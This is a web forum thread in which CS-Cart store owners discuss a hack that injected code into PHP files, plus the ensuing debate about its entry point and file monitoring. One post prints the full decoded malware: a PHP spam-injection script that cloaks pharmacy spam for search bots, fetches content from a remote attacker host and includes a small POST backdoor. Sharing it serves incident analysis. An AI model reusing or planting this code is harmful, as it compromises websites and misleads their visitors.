Wordpress hacker attack, CS-Cart can be affected

Store Builder in detail Security
#1

Two of my sites were hacked today.



One is running 4.1.3 the other 4.1.5.



Development sites running on the same server were not hacked, and the hacks resulted in “500 Server Error” and were thus not functional.



I am therefore thinking that this is a front end attack, not shell access.



The files modified were all in Tygh directory. You can identify the exact files hacked by going through the apache2 error.log and seeing which file breaks the server (eg. Database.php). This is what is appended to the first line of the affected php files:


```php


```



I am running PHP 5.5 and Apache 2.4 and presently have mod_security disabled. That is getting corrected as I speak.

#2

Sites just got hacked again…while I was installing modsecurity 2.8. Modsecurity is now up and running. Let's see if that helps.

#3

I have decoded the payload. This is what the hacker(s) attempted to inject. It is a bit late here so I cannot focus too well, but it seems to be some kind of link spam/traffic scam link. It also seems to target WordPress, it is not CS Cart specific, so also check your Wordpress sites.



if (!defined('frmDs')){
define('frmDs' ,1);
error_reporting(0);

function frm_dl ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false;
curl_close ($ch);
} else {$out = @file_get_contents($url);}
return trim($out);
}

function frm_crpt($in){
$il=strlen($in);$o='';
for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
return $o;
}

function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
$fe = file_exists($f);
if(!$fe || time() - filemtime($f) > 60 * $cmtime)
{
$dlc=frm_dl($link);
if($fe && $dlc===false)
@touch($f);
else
{
if($fe && empty($dlc) && $toe)
{
@touch($f);
}
else
{
if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
else{return $dlc;}
}
}
}
$fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):'';
}

function frm_isbot(){
$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
if(!$ua)return true;
$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
foreach ($bots as $B) if(strpos($ua, $B)!==false) return true;
$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
$hba=array('google','msn','yahoo');
if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
return false;
}

function frm_tmpdir(){
$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
if ($t = getenv($v)) {$fs[]=$t;}
}
if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
$fs[]='.';

foreach ($fs as $f){
$tf = $f.'/'.md5(rand());
if($fp = @fopen($tf, 'w')){
fclose($fp);
unlink($tf);
return $f;
}
}
return false;
}
function frm_seref(){
$r = @strtolower($_SERVER["HTTP_REFERER"]);
$ses = array('google','bing','yahoo','ask','aol');
foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
return false;
}

function frm_havekey($s=false){
$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
return '';
}

function frm_strtonum($Str, $Check, $Magic) {
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function frm_chhash($String) {
$Check1 =frm_strtonum($String, 0x1505, 0x21);
$Check2 = frm_strtonum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
$Hashnum = ($T1 | $T2);
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length - 1; $i >= 0; $i --) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}

function frm_chpr($url,$td){
$ch=frm_chhash($url);
$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
}

function frm_red($k){
if(!frm_isbot() && frm_seref()){
$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$s=@urlencode($_SERVER['HTTP_REFERER']);
die("");
}
}

$tdir = frm_tmpdir();
$isb=frm_isbot();
$k=frm_havekey();
$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
$sp = "http://bpiiflhbw.ontheweb.nu/stat/feed.php?pa=$parg&h=$host";
//
$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if($isb && ($ppr = frm_chpr($tp)) > 1){
$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
if($pc) die($pc);
}
//
$ruri = strtolower($_SERVER['REQUEST_URI']);
$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
frm_red($k);
die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
}
if (($ruri=='/' || $ruri=='/index.php') && $isb) {
$c=frm_getcache($tdir, $sp ,60*24);
if($c)die($c);
}
//
if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
if(strpos($sdl, '|'.$ruri.'|') !== false){
frm_red($k);
die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
}
}
}
if($k) frm_red($k);
}

#4

[quote name='vmajor' timestamp='1401798444' post='184941']

I have decoded the payload. This is what the hacker(s) attempted to inject:



$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');




[/quote]

Bad news here, are they hacking a Wordpress install?

#5

yea :-) It seems that it is either not CS Cart specific or that it actually expects Wordpress but it’s injection method seems to be CMS agnostic. Thus it may be targeting a platform vulnerability. I find this a bit disturbing since we are on the latest updates branch for Apache 2.4 and PHP 5.5.

#6

Guys, I nearly fainted when I saw the thread title(

I hope you do not mind if I rename it.

#7

Well, CS Cart was affected. It is not a “can be”. Both 4.1.3 and 4.1.5 were taken down, twice. It does appear that the target is Wordpress and that when the CS Cart php files are hacked the result is “500 Server Error” rather than the intended bounty of spam.



Nevertheless this is rather serious as I only managed to recover the sites because I had local backups.

#8

Guys, just because cs-cart was affected DOES NOT MEAN that cs-cart itself is vulnerable.



If the entry point is outside of cs-cart, then file ownership/permissions are to blame or the “site account” has been compromised.



What are the ownerships and permissions of the affected files and the parent directory?



Please be cautious of claims. Everyone is very sensitized to security right now (good thing) and you must be sure of claims before they are made.



And again, if you were monitoring files on a daily (or more frequent) basis, then you would be aware that a file like Database.php had been modified.

#9

True, I do not know the entry point for this particular hack. The shell/user was not compromised, of that I am fairly certain as I went through a pretty thorough process verifying this. Besides the system is…um, trapped. Brute force will not work.



I also investigated the hack more thoroughly, but I have not finished yet. The hack is a variant of this: http://codinginpublic.com/2013/05/dissection-of-the-frm_frame-injection-script/



I will need to find out how they got the hack in. As mentioned the system is entirely up to date and the WP blog is set to auto update (v 3.9.1 now).



I am not claiming anything. I am reporting.



Thank you for underlining the monitoring of files thing…if you read my opening post you'd have noticed that the sites were taken offline by the hack thus it was rather hard not to notice the file modification.



V.